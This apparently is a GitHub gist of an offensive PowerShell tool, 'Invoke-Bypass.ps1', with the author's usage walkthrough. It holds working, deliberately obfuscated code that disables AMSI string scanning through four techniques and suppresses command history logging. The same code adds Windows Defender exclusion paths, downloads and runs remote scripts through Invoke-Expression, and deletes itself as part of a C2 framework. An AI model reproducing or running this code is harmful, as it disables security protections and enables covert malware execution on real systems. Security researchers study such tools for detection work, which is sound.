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Last active December 23, 2023 04:10
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Disable AMS1 string scanning within curent process.
Disable AMS1 within current process.
Author: @r00t-3xp10it
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: Assembly {native}
Optional Dependencies: IWR {native}
PS cmdlet Dev version: v1.1.12
This cmdlet attempts to disable AMS1 string scanning within
the current process context (terminal console) It also allow is
users to execute any inputed script trough AMS1 bypass technic.
These techniques only disable AMS1 within current process.
Remark: It does not exec cmdlets that requires 'Import-Module'
Remark: Adding AV exclusion path requires administrator privs.
.Parameter List
List cmdlet AMS1 bypass technics (default: false)
.Parameter Technic
The AMS1 bypass technic to use (default: 2)
.Parameter Filepath
Execute input script trough bypass? (default: false)
.Parameter FileArgs
The script to be executed arguments (default: false)
.Parameter PayloadURL
The script to be downloaded\executed! (default: false)
.Parameter ExcludeLocation
The folder to exclude from defender scans (default: false)
PS C:\> .\Invoke-Bypass.ps1 -list "technic"
List cmdlet AMS1 bypass technics available
PS C:\> .\Invoke-Bypass.ps1 -technic "1"
Bypass ams1 detection on current proccess
PS C:\> .\Invoke-Bypass.ps1 -technic "2" -filepath "evil.ps1"
Bypass ams1 detection on current proccess and execute evil.ps1
PS C:\> .\Invoke-Bypass.ps1 -technic "3" -filepath "evil.ps1" -fileargs "-action 'true'"
Bypass ams1 detection on current proccess and execute evil.ps1 with arguments (parameters)
PS C:\> .\Invoke-Bypass.ps1 -technic "4" -payloadUrl "" -fileargs "-sysinfo enum"
Bypass ams1 detection on current proccess and download\execute sysinfo.ps1 with arguments ( -sysinfo enum )
PS C:\> .\Invoke-Bypass.ps1 -technic "2" -filepath "$Env:TMP\evil.ps1" -ExcludeLocation "$Env:TMP"
Bypass ams1 detection on current proccess, execute evil.ps1 and add 'TMP' dir to AV exclusion path.
None. You cannot pipe objects into Invoke-Bypass.ps1
* Disable AMS1 within current process.
+ Executing AMS1 bypass technic [1]..
Technic : 1
Bypass : success
Disclosure : @mattifestation
Description : FORCE_AM`SI_ERROR
POC : Auto-Execute: evil.ps1
Report : string detection DISABLED on console!
Executing : evil.ps1
#CmdLet Global variable declarations!
[CmdletBinding(PositionalBinding=$false)] param(
$cmdletVersion = "v1.1.12"
#Cmdlet Global variable declarations
$ErrorActionPreference = "SilentlyContinue"
#Disable Powershell Command Logging for current session.
Set-PSReadlineOption HistorySaveStyle SaveNothing|Out-Null
$host.UI.RawUI.WindowTitle = "@Invoke-Bypass $cmdletVersion"
Write-Host "`n* Disable AM`S`1 within current process." -ForegroundColor Green
If($Technic -lt 1 -or $Technic -gt 4)
[int]$Technic = 2
write-host " + " -ForegroundColor DarkYellow -NoNewline;
write-host "wrong technic input, default to '$Technic'" -ForegroundColor red -BackgroundColor Black
If($Filepath -ne "false")
If($Filepath -iNotMatch '(.ps1|.bat|.vbs)$')
write-host "* Error:" -ForegroundColor Red -NoNewline;
write-host "Invoke-Bypass accepts .ps1,.bat,.vbs formats" -ForegroundColor DarkGray
exit #Exit @Invoke-Bypass
If($List -iMatch "^(technic|technics)$")
write-host " +" -ForegroundColor DarkYellow -NoNewline;
write-host " Listing A`MS`1 bypasses available .." -ForegroundColor DarkGray
write-host "`n Technic Description" -ForegroundColor DarkYellow
write-host " ------- -----------"
write-host " 1 PS`V2_DO`WNGR`ADE"
write-host " 2 FORC`E_AM`SI_ERROR"
write-host " 3 AM`SI_UT`ILS_P`AT`CH"
write-host " 4 AM`SI_UT`ILS_BAS`E64"
write-host ""
write-host "* " -ForegroundColor Green -NoNewline;
write-host "Syntax examples:" -ForegroundColor DarkGray
write-host " .\Invoke-Bypass.ps1 -technic '1'"
write-host " .\Invoke-Bypass.ps1 -technic '2' -filepath 'evil.ps1'"
write-host " .\Invoke-Bypass.ps1 -filepath 'evil.ps1' -ExcludeLocation `"`$Env:TMP`""
write-host ""
write-host "*" -ForegroundColor Green -NoNewline;
$IoStream = "In@v" + "ok@e-M+m+" + "k@atz" -join ''
$Forbiden = $IoStream.Replace("@","").Replace("+","i")
write-host " Executing A`MS`1 bypass technic [" -ForegroundColor DarkGray -NoNewline;
write-host "$Technic" -ForegroundColor DarkYellow -NoNewline;
write-host "] .." -ForegroundColor DarkGray
Start-Sleep -Milliseconds 500
If($ExcludeLocation -ne "false")
Author: @r00t-3xp10it
Helper - Exclude directory from defender scans!
Adding AV exclusion paths requires administrator privs.
This setting excludes dirs from real-time\schedule scans.
$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")
$MarchalCarmona = "Set-Mp@Pr"+"efe@ren@ce -Ex@cl@u"+"sio@nPa"+"@th $ExcludeLocation -force" -replace '@',''
$MakeSure = $ExcludeLocation.Split('\')[-1]
"$MarchalCarmona"|&('@ex' -replace '@','I')
If((Get-MpPreference).ExclusionPath -iMatch "($MakeSure)$")
write-host " + " -ForegroundColor DarkYellow -NoNewline;
write-host "AV Exclu`sion Path: '" -ForegroundColor DarkGray -NoNewline;
write-host "$ExcludeLocation" -ForegroundColor DarkYellow -NoNewline;
write-host "'" -ForegroundColor DarkGray;
write-host " + ExcludeLoc`ation: fail to add exclusion path .." -ForegroundColor Red -BackgroundColor Black;
write-host " + ExcludeLoca`tion: Administrator privs required .." -ForegroundColor Red -BackgroundColor Black;
If($Technic -eq 1)
Author: @r00t-3xp10it
Disclosure: @nullbyte
Helper - PS`V2_DO`WNGR`ADE!
$Disclosure = "@nullbyte"
$TechnicName = "PS`V2_DO`WNGR`ADE"
#Retrieve NET Framework version
$NETversions = (Get-ChildItem "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP" -recurse|Get-ItemProperty -name Version -EA 0|Where-Object{$_.PSChildName -match '^(?!S)\p{L}'}).Version
If($NETversions -Match "2.0.50727")
write-host "`n`n Technic : $Technic"
write-host " Bypass : Success" -ForegroundColor Green
write-host " Disclosure : $Disclosure"
write-host " Description : $TechnicName"
If($FilePath -ne "false")
If($FilePath -Match '\\')
$FilePath = $FilePath.Split('\')[-1] # evil.ps1
write-host " POC : Execute: $FilePath" -ForegroundColor DarkYellow
write-host " Report : String detection DISABLED on console!"
write-host " Executing : " -ForegroundColor DarkGray -NoNewline
write-host "$FilePath`n" -ForegroundColor Green
$DownGradedPSesion = "po@we"+"rsh@el@l -@ver"+"si@on @2 -f@i"+" l@e $FilePath" -replace '@',''
"$DownGradedPSesion"|&('{0}ex' -F'I')
ElseIf($PayloadUrl -ne "false")
$FilePath = $PayloadURL.Split('/')[-1] # evil.ps1
write-host " POC : Execute: $FilePath" -ForegroundColor DarkYellow
write-host " Report : String detection DISABLED on console!"
write-host " Executing : " -ForegroundColor DarkGray -NoNewline
write-host "$FilePath`n" -ForegroundColor Green
$DownGradedPSesion = "po@we"+"rsh@el@l -@ver"+"si@on @2 -f@i"+" l@e $FilePath" -replace '@',''
"$DownGradedPSesion"|&('{0}ex' -F'I')
$returnversion = (Get-Host).Version.Major
write-host " POC : Execute: $Forbiden" -ForegroundColor DarkYellow
write-host " Report : String detection DISABLED on console!"
write-host " Remark : Exec 'exit' to return to PS version ${returnversion}"
write-host " Executing : " -ForegroundColor DarkGray -NoNewline;
write-host "powersh`ell -`ve`rsio`n 2`n" -ForegroundColor Green;
$DownGradedPSesion = "po@we"+"rsh@el@l -@ver"+"si@on @2 -f@i"+" l@e $FilePath" -replace '@',''
"$DownGradedPSesion"|&('{0}ex' -F'I')
write-host "`n`n Technic : $Technic"
write-host " Bypass : Fail" -ForegroundColor DarkRed
write-host " Disclosure : $Disclosure"
write-host " Description : $TechnicName"
write-host " POC : Execute: $FilePath" -ForegroundColor DarkYellow
write-host " Report : " -NoNewline;
write-host ".Net version 2.0.50727 not found. Can't start PowerShell V2`n`n" -ForegroundColor DarkRed
ElseIf($Technic -eq 2)
Author: @r00t-3xp10it
Disclosure: @mattifestation
$Disclosure = "@mattifestation"
$TechnicName = "FORCE_AM`SI_ERROR"
Try{#Ams1 bypass technic n� 2
$Xdatabase = 'Utils';$Homedrive = 'si'
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$DiskMgr = 'Syst+@.M£n£g' + 'e@+nt.Auto@' + '£tion.A' -join ''
$fdx = '@ms' + '£In£' + 'tF@£' + 'l+d' -Join '';Start-Sleep -Milliseconds 300
$CleanUp = $DiskMgr.Replace('@','m').Replace('£','a').Replace('+','e')
$Rawdata = $fdx.Replace('@','a').Replace('£','i').Replace('+','e')
$SDcleanup = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $CleanUp,$Homedrive,$Xdatabase))
$Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
}Catch{Throw $_}
ElseIf($Technic -eq 3)
Author: @r00t-3xp10it
Disclosure: @mattifestation
Helper - AM`SI_UT`ILS_P`AT`CH!
$Disclosure = "@mattifestation"
$TechnicName = "AM`SI_UT`ILS_P`AT`CH"
Try{#Ams1 bypass technic n� 3
$MsTeamsId = "4456625220575263174452554847"
$ComponentDeviceId = "N`onP" + "ubl`ic" -join ''
$Drawing = "Sy@ste+.M@ana"+"ge+e@nt" + ".Auto@+ati@on."+"A+s@i" + "U@ti@ls" -Join ''
$Graphics = [string](0..13|%{[char][int](53+($MsTeamsId).substring(($_*2),2))}) -Replace ' '
$imgForm = $Drawing.Replace("@","").Replace("+","m");$Bitmap = [Ref].Assembly.GetType($imgForm)
$i0Stream = $Bitmap.GetField($Graphics,"$ComponentDeviceId,Static");$i0Stream.SetValue($null,[bool]0x12AE)
}Catch{Throw $_}
ElseIf($Technic -eq 4)
Author: @r00t-3xp10it
Disclosure: @Unknown
Helper - AM`SI_UT`ILS_BAS`E64
$Disclosure = "@Unknown"
$TechnicName = "AM`SI_UT`ILS_BAS`E64"
Try{#Ams1 bypass technic n 4
$KernelID = "No@nP" + "@ub@lic" -replace '@',''
}Catch{Throw $_}
## String_POC_Obfuscation
$FileName = $Filepath.Split('\')[-1]
$CmdletNa = $PayloadURL.Split('/')[-1]
If($Filepath -ne "false")
$POC = "Auto-Execute: $FileName"
$ttl = "$FileName"
ElseIf($Filepath -ieq "false" -and $PayloadURL -ieq "false")
$POC = "Manual-Execute: $Forbiden"
$ttl = "$Forbiden"
ElseIf($PayloadURL -ne "false")
$POC = "Download-Execute: $CmdletNa"
$ttl = "$CmdletNa"
## Check current console AM`S1 state
$FacebookID = "4456625220575263174452554847"
$ComponentId = "N`onP" + "ubl`ic" -join ''
$Drawing = "Sy@ste+.M@ana"+"ge+e@nt" + ".Auto@+ati@on."+"A+s@i" + "U@ti@ls" -Join ''
$Graphics = [string](0..13|%{[char][int](53+($FacebookID).substring(($_*2),2))}) -Replace ' '
$WindowSize = $Drawing.Replace("@","").Replace("+","m");$Bitmap = [Ref].Assembly.GetType($WindowSize)
$BypassState = "Success"
$AmsiState = "String detection DISABLE on console!"
$BypassState = "Fail?"
$AmsiState = "String detection ENABLE on console!"
write-host "`n`n Technic : $Technic"
write-host " Bypass : " -NoNewline
If($BypassState -Match '^(Success)$')
write-host "$BypassState" -ForegroundColor Green
write-host "$BypassState" -ForegroundColor Red
write-host " Disclosure : $Disclosure"
write-host " Description : $TechnicName"
write-host " POC : $POC"
write-host " Report : " -NoNewline
If($BypassState -Match '^(Success)$')
write-host "$AmsiState" -ForegroundColor Green
write-host "$AmsiState" -ForegroundColor Red
If($Filepath -ne "false")
write-host " Executing : " -ForegroundColor DarkGray -NoNewline
write-host "$ttl`n" -ForegroundColor Green
Write-Host "* Error: executing technic '$Technic' bypass!" -ForegroundColor Red -BackgroundColor Black
Write-Host "`n";exit
Start-Sleep -Seconds 1
If($Filepath -ne "false")
Author: @r00t-3xp10it
Helper - Execute inputed cmdlet
This function exec cmdlets with or without arguments.
Remark: It does not exec cmdlets that requires 'Import-Module'
$Filepath = ".\" + "$Filepath" -join ''
If($FileArgs -ne "false")
&('{0}ex' -F'I') "$Filepath $FileArgs"
#$Filepath = "$Filepath" -replace '.\\','' -replace '.ps1','' #Import-Module function
#Import-Module -Name .\$Filepath -Force;&"$Filepath $FileArgs" #Import-Module function
&('{0}ex' -F'I') "$Filepath"
#$Filepath = "$Filepath" -replace '.\\','' -replace '.ps1','' #Import-Module function
#Import-Module -Name .\$Filepath -Force;&"$Filepath" #Import-Module function
If($PayloadURL -ne "false")
Author: @r00t-3xp10it
Helper - Download\Execute cmdlet trough AMS1_bypass!
It does not exec cmdlets that requires 'Import-Module'
#Parse URL data
$FilePath = $PayloadURL.Split('/')[-1] # evil.ps1
$DomainName = $PayloadURL.Split('/')[2] # github
If($PayloadURL -iNotMatch '^[http(s)://]')
#Wrong download fileformat syntax user input
Write-Host "* Error: -payloadURL '<url>' requires http(s) format!" -ForegroundColor Red -BackgroundColor Black
Write-Host "";Start-Sleep -Seconds 2;exit ## @Invoke-Bypass
If($PayloadURL -iNotMatch '(.ps1|.psm1|.psd1)$')
#Wrong download fileformat syntax user input
Write-Host "* Error: -payloadURL '<url>' accepts .ps1,.psm1,.psd1 formats!" -ForegroundColor Red -BackgroundColor Black
Write-Host "";Start-Sleep -Seconds 2;exit ## @Invoke-Bypass
If($PayloadURL -iMatch '^(https://)')
$PortNumber = "445"
ElseIf($PayloadURL -iMatch '^(http://)')
$PortNumber = "80"
#Build Table display
Write-Host "`n`n* Download\Execute '$Filepath'" -ForegroundColor Green
Write-Host "+ " -ForegroundColor DarkYellow -NoNewline;
Write-Host "[connecting to] $DomainName TCP $PortNumber .." -ForegroundColor DarkGray
Write-Host " uri: " -ForegroundColor DarkGray -NoNewline;
Write-Host "$PayloadURL`n" -ForegroundColor DarkYellow
#Download cmdlet
iwr -uri "$PayloadURL" -OutFile "$FilePath"|Unblock-File
$Filepath = ".\" + "$Filepath" -join ''
If($FileArgs -ne "false")
&('{0}ex' -F'I') "$Filepath $FileArgs"
#$Filepath = "$Filepath" -replace '.\\','' -replace '.ps1','' #Import-Module function
#Import-Module -Name .\$Filepath -Force;&"$Filepath $FileArgs" #Import-Module function
&('{0}ex' -F'I') "$Filepath"
#$Filepath = "$Filepath" -replace '.\\','' -replace '.ps1','' #Import-Module function
#Import-Module -Name .\$Filepath -Force;&"$Filepath" #Import-Module function
write-host "`n"
If($Egg -ieq "True")
#Auto-Delete this cmdlet (@Meterpeter C2 internal function)
Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force
Copy link

r00t-3xp10it commented Mar 24, 2022

This cmdlet attempts to disable AMS1 string scanning within
the current process context (terminal console) It also allow is
users to execute any inputed script trough AMS1 bypass technic.

These techniques only disable AMS1 within current process.
Remark: It does not exec cmdlets that requires 'Import-Module'

We are going to download a cmdlet that triggers detection to test the bypass later..

iwr -uri "" -outfile "NoAmsi.ps1"

now lets execute NoAmsi.ps1 to test if AMSI stops it from running

.\NoAmsi.ps1 -action list


Now we are going to download the cmdlet that allow us to bypass amsi detection

iwr -uri "" -outfile "Invoke-Bypass.ps1"

Now we are going to use Invoke-Bypass.ps1 to execute NoAmsi.ps1 cmdlet

.\Invoke-Bypass.ps1 -technic "2" -filepath "NoAmsi.ps1" -fileargs "-action list"


Final Notes:


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